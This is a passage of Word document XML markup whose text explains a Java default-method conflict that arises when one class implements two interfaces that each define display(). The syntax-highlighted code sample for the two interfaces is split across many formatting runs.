        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The code you've provided is an example of multiple inheritance in Java, where a class (MyClass) implements two interfaces (InterfaceA and InterfaceB), each of which has a default method with the same signature (display()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D25F77" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Explanation of the Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A528A1" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>InterfaceA</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> has a default method display(), which prints "Display from InterfaceA".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79147E81" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>InterfaceB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> also has a default method display(), which prints "Display from InterfaceB".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224608C9" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The class MyClass implements both interfaces InterfaceA and InterfaceB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CBCC7A" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Issue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C704CC5" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When a class implements multiple interfaces that have the same default method, there is a conflict because Java does not know which display() method to call. The compiler will throw a </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compile-time error</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> saying that the default method display() is inherited from more than one interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3E0380" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>How to Implement Both display() Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05190891" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F851C0" w:rsidP="00F851C0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To resolve this conflict, you can override the display() method in MyClass and explicitly call both default methods from the interfaces. Here's how you can implement it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07208E18" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InterfaceA</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F7EDAA" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> display</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7065360C" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Display from InterfaceA"</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D75966" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618DA5C0" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121C8ECB" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9EC5A1" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>InterfaceB</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2210A10F" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> display</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FF81C1" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>out</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>println</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"Display from InterfaceB"</w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F21C9FD" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4ED8EF" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F851C0">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E5237E" w14:textId="77777777" w:rsidR="00F851C0" w:rsidRPr="00F851C0" w:rsidRDefault="00F85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597187"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
